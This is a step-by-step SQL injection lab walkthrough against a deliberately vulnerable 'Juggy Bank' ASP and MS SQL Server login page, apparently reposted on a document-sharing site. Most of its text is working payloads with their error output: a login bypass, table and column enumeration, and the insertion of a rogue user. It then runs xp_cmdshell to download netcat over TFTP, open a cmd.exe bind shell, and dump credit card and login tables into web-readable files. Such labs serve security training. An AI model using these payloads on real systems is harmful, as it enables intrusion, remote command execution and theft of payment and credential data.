Juggy Bank SQL Injection Lab

First of all let’s work out what data base the system is running. On your 2003 Server, open your web browser on type http://localhost/client2.htm You should have an entry that shows the Juggy Bank web page In the Login Name box type a single quote ‘ and press return. This should return and error page showing the database type and the asp script that has run Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '' and password = ''. /login.asp, line 5

pdf5 trang | Chia sẻ: tlsuongmuoi | Lượt xem: 2561 | Lượt tải: 0download
Bạn đang xem nội dung tài liệu Juggy Bank SQL Injection Lab, để tải tài liệu về máy bạn click vào nút DOWNLOAD ở trên
Juggy Bank SQL Injection Lab First of all let’s work out what data base the system is running. On your 2003 Server, open your web browser on type You should have an entry that shows the Juggy Bank web page In the Login Name box type a single quote ‘ and press return. This should return and error page showing the database type and the asp script that has run Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '' and password = ''. /login.asp, line 5 As can be seen the back end database is running on MS SQL and the service doesn’t handle error messages by redirecting to an oooops page. Now let’s try blind SQL injecting into the Login Name box. This should bypass the authentication system In the Login box type luke' or 1=1 -- This then makes the SQL statement passed to the database as follows select * from userinfo where username=’luke’ or 1=1 -- and password=’’ Anything after the -- is ignored as a comment. This should log you into the web page as the first user on the database. Now let’s go back to the login screen and try enumerating the table. The first thing we need is the table name. Insert into the login box the following ' having 1=1 -- This will cause the following error Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'userinfo.username' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /login.asp, line 5 Notice the highlighted information, this is the Table name - userinfo and the column name - username Now we need to know the next columns in the table, type the following in the Login box ' group by userinfo.username having 1=1 -- This causes the following error Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'userinfo.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /login.asp, line 5 Now let’s try once more with the userinfo.password ' group by userinfo.password having 1=1 -- We get the same column again, indicating two columns in the userinfo table. Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'userinfo.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /login.asp, line 5 We must now enumerate the column types ' union select sum(username) from userinfo -- Which gives the following error indicating type is varchar Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument. /login.asp, line 5 And same for the password column ' union select sum(password) from userinfo -- Which is also a varchar. Now let’s create a new user. ' ; insert into userinfo values('john','password')-- Login with the new user created. Further Investigation Now let’s get some information on other databases. Let put a file on the web server.......... '; exec master..xp_cmdshell "echo I was here on %date% > c:\inetpub\wwwroot\Boo.txt" -- To check that the file is on the server open To fetch a file from a TFTP server e.g. netcat from 172.16.0.11 server '; exec master..xp_cmdshell 'tftp -i 172.16.0.11 get nc.exe c:\inetpub\wwwroot\nc.exe' -- and then execute it listening on port 9999 ';exec master..xp_cmdshell 'c:\inetpub\wwwroot\nc.exe -L -d -e cmd.exe -p 9999' -- You should now be able to telnet to the localhost on port 9999 Now let’s dump the credit card details into a txt file ';exec master..xp_cmdshell 'osql -E -Q "select * from juggybank..creditcard" -o c:\inetpub\wwwroot\card_details.txt' -- To fetch those details off the web server browse to the page To dump the login details ';exec master..xp_cmdshell 'osql -E -Q "select * from juggybank..userinfo" - o c:\inetpub\wwwroot\logins.txt' -- To fetch those details off the web server browse to the page Similar commands con be run to mine data on sysdatabases ';exec master..xp_cmdshell 'osql -E -Q "select * from master..sysdatabases" -o c:\inetpub\wwwroot\masterdatabase.txt' -- ';exec master..xp_cmdshell 'osql -E -Q "select * from juggybank..sysobjects where xtype=''u'' " -o c:\inetpub\wwwroot\juggybanktables.txt' -- In the above statement xtype=’’u’’ is actually two sets of single quotes not a double To fetch those details off the web server browse to the page and Another way with stored procedures The above can be achieved by using a stored procedure. '; exec sp_makewebtask "c:\inetpub\wwwroot\evil.html", "select * from userinfo"; -- Now request this page with

Các file đính kèm theo tài liệu này:

  • pdfJuggy Bank SQL Injection Lab.pdf
Tài liệu liên quan